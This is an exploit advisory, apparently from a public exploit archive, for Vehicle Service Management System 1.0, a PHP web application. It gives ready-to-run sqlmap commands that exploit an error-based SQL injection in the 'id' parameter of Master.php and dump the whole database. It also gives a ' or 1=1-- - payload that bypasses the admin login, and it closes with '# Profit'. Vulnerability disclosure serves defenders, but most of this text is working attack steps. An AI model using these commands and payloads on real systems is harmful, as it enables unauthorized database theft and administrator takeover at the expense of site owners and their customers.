Vehicle Service Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities one of which allows for authentication bypass.
d3cafda8b344117eabc44ad3416220ca# Exploit Title: Vehicle Service Managment 1.0 - SQL Injection Error Based
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10
Steps-To-Reproduce:
Step 1 - Open sqlmap
Step 2 – Enter the payload string for sqlmap (edit localhost to site address)
Setp 3 - Dump database info.
SQLMAP Command:
sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&[email protected]&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --technique=E
Results:
Parameter: id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(8850=8850,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdrq&category_id=2&owner_name=aa&contact=aa&[email protected]&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick Up&pickup_address=aa
Step 3:
Dump the entire database.
sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&[email protected]&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --dump
# Exploit Title: Vehicle Service Managment 1.0 - SQL Authentication Bypass
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10
Steps-To-Reproduce:
Step 1 - Goto http://site/admin/login.php (to login)
Step 2 – Enter the payload below for username and password
Setp 3 - Login as admin!
Payload:
' or 1=1-- -
# Profit